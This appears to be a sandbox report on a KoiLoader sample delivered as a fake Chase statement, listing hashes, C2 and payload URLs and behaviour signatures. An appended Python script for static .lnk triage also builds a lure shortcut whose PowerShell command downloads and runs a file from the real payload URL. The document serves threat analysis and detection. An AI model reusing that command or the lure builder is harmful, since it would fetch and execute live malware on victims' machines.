General

  • Target

    chase_may_statement.zip

  • Size

    856B

  • Sample

    250521-y7f14askz9

  • MD5

    703c9ab297b4f6c2d97ecccf2295697f

  • SHA1

    1d309647d121596d2a9a5bca27efa4cb3a77f17c

  • SHA256

    e94ee95203d453093817a2f653b65e82781e16f9fe6001258c96f4cb545e466f

  • SHA512

    0e48ec75073d6d2930b68932e876459c5d66cd1c9fda05161ffbfc984a68a32e0d4cf0ff2ba48e7abe54be1838d6cfe2e208bffcb5ac0e7df91844a4c0c5c5e3

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper: https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Extracted

  • Family

    koiloader

  • C2

    http://193.23.219.255/relabel.php

  • Attributes

    payload_url: https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper: https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02

Targets

    • Target

      chase_may_statement.lnk

    • Size

      1KB

    • MD5

      6ee8fd49c4dd5141531a3f7a20e0e7f9

    • SHA1

      d882bedf16272cd898039255c36a54ef1a13eaa9

    • SHA256

      5854c6560fe3bf47cad820d55fa798385439821c8c87b5b0df83995df320ab5b

    • SHA512

      8936a6ff9c5e7f3e4a66dd2855cfc4315053496c33f8edb860b921d5b7d205afab2b8612fa381a00b9bdd480f633377843dc85231186d3324972ea6cf37a4404

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • KoiLoader family

    • Detects KoiLoader payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Command and Scripting Interpreter: PowerShell

      Uses a powershell.exe command.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence.

    • Indicator Removal: Clear Persistence

      Clears artifacts associated with previously established persistence, such as scheduled tasks, on the host.
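
The target chain above (a .zip lure carrying a .lnk that launches PowerShell with a web request to the payload URL) can be triaged statically without opening the shortcut. The following is an added example, not part of the sandbox report and not KoiLoader's own code: a minimal MS-SHLLINK parser that pulls the relative path and command-line arguments out of a shortcut, flags the powershell.exe / hidden-window / download-cmdlet pattern, and walks a zip in memory to do this for every .lnk inside. The .lnk bytes and the PowerShell command line are constructed here to mimic the behaviour the signatures describe; they are not the real chase_may_statement.lnk, and the exact command is an assumption (only the payload URL comes from the report).

```python
"""Static triage of a zip -> .lnk -> PowerShell lure chain.

Added example, not code from the sandbox report. The shortcut built by
build_lnk() is a constructed stand-in for chase_may_statement.lnk; the
command line inside it is an assumption, not the real sample's content.
"""
import io
import re
import struct
import zipfile

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Fixed LinkCLSID {00021401-0000-0000-C000-000000000046}, little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this order when their flag bit is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(relative_path, arguments):
    """Construct a minimal .lnk: 76-byte ShellLinkHeader followed by
    RELATIVE_PATH and COMMAND_LINE_ARGUMENTS StringData (no IDList, no LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        0x4C, LNK_CLSID, flags,
        0,           # FileAttributes
        0, 0, 0,     # Creation/Access/Write time
        0, 0,        # FileSize, IconIndex
        1,           # ShowCommand (SW_SHOWNORMAL)
        0, 0, 0, 0,  # HotKey, Reserved1..3
    )

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Validate the header, skip LinkTargetIDList and LinkInfo if present,
    and return the StringData fields as a dict."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize covers itself
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
DOWNLOAD_RE = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|bitsadmin)\b", re.I)


def triage_lnk(data):
    """Return parsed fields plus findings matching the report's signatures."""
    fields = parse_lnk(data)
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    findings = []
    if re.search(r"powershell(?:\.exe)?", cmd, re.I):
        findings.append("launches powershell.exe")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        findings.append("hidden window")
    if DOWNLOAD_RE.search(cmd):
        findings.append("web download cmdlet")
    return {"fields": fields, "findings": findings, "urls": URL_RE.findall(cmd)}


def scan_zip(zip_bytes):
    """Triage every .lnk inside a zip archive held in memory."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                results[info.filename] = triage_lnk(zf.read(info))
    return results


# Constructed sample: the command line is an assumption; only the URL is from the report.
SAMPLE_ARGS = ('-w hidden -nop -c "iwr https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02 '
               '-OutFile $env:TEMP\\x.exe; & $env:TEMP\\x.exe"')
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", SAMPLE_ARGS)


def build_sample_zip():
    """Constructed stand-in for chase_may_statement.zip wrapping the sample .lnk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("chase_may_statement.lnk", SAMPLE_LNK)
    return buf.getvalue()


if __name__ == "__main__":
    for name, result in scan_zip(build_sample_zip()).items():
        print(name, result["findings"], result["urls"])
```

The parser deliberately stops at StringData; it does not walk ExtraData blocks, so a shortcut that hides its command in an EnvironmentVariableDataBlock or pads the header will need a fuller parser. Any URL it recovers can be matched directly against the payload_url and C2 listed in the extracted config.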

MITRE ATT&CK Enterprise v16

Tasks